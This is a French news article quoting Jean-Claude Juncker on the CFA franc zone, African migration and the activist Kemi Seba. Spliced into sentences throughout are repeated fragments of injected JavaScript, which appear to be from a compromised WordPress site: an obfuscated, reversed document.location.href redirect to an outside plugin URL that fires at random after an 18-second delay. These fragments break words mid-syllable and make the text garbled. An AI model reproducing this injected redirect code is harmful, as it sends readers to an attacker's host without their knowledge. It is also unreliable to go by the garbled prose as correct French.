AFRIQUEECONOMIEEUROPE

Les africains ne sont pas prêts à quitter le Franc CFA”, selon le président de la Commission Européenne

“Les Africains ne font que parler, mais pas prêts de quitter la zone franc CFA”, selon Jean-Claude Juncker.

Le président de la Commission européenne, Jean-Claude Juncker, a affirmé que les Africains ne montrent pas un réel désir de quitter la zone du franc CFA qui regroupe 14 pays africains qui utilisent la monnaie CFA.

Cette déclaration a été faite par M. Juncker lors d’une interview exclusive accordée à chaîne de télévision Euronews.

« Je ne vois pas un désir réel des Africains de quitter cette zone qui toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donne une certaine visibilité à l’Afrique. Je ne voudrais pas une chose, celle de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner l’impression aux jeunes Africains que l’Europe ou la France imposent sa monnaie à l’Afrique », a-t-il dit.

« J’aimerais voir une plus grtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}ande émancipation en Afrique. Nous avons des rencontres régulières avec les pays concernés afin d‘évaluer la portée des problèmes qui se posent dans la zone CFA. », a ajouté le président de la Commission de l’Union européenne.

Le journaliste d’Euronews Abdel en Vrai qui dirigeait l’interview a attiré l’attention de Jean-Claude Juncker sur le fait des millions d’Africains sont contre cette monnaie. Il lui a par ailleurs demtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andé ce qu’il ferait s’il en avait le pouvoir de se débarrasser du franc CFA.

« Je suis intéressé par les points de vue des jeunes Africains et leur désir de se libérer…La question est de savoir si toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tous les pays ont leur propre monnaie, sera-t-elle la meilleure solution ? », a indiqué Jean-Claude Juncker.

À propos des migrants, M. Juncker a déclaré que l’Europe devrait investir en Afrique si elle veut que les Africains restent sur leur continent.

« Vous devez savoir que les Africains sont 1,2 milliard, dans quelques décennies, ils seront 2,5 milliards. Nous devons être là en matière de solidarité interne en Afrique », a-t-il renchéri.

Les 14 pays africains qui utilisent le franc CFA sont : le Bénin, le Burkina Faso, la Côte d’Ivoire, la Guinée-Bissau, le Mali, le Niger, le Sénégal et le Togo, pour l’Union monétaire ouest-africaine (UEMOA); et le Cameroun, la République Centrafricaine, le Tchad, la République du Congo, la Guinée équatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toriale et le Gabon font partie de la Communauté économique et monétaire des Etats de l’Afrique centrale (CEMAC).

Le franc CFA a été créé à l’origine en 1939. Il a traversé plusieurs transformations et certains pays comme la Guinée ont quitté la zone.

Cette monnaie est vivement critiquée par plusieurs Africains quant à sa dépendance vis-à-vis de l’Euro et l’influence de la France.

L’activiste Kemi Seba, français d’origine béninoise a récemment été expulsé du Sénégal où il a brûlé un billet de 5000 CFA pour protester contre la monnaie et les relations franco-africaines.

Pour l’activiste et ses partisans, le CFA représente un symbole de la toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domination la France sur les Etats africains.

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *

%d blogueurs aiment cette page :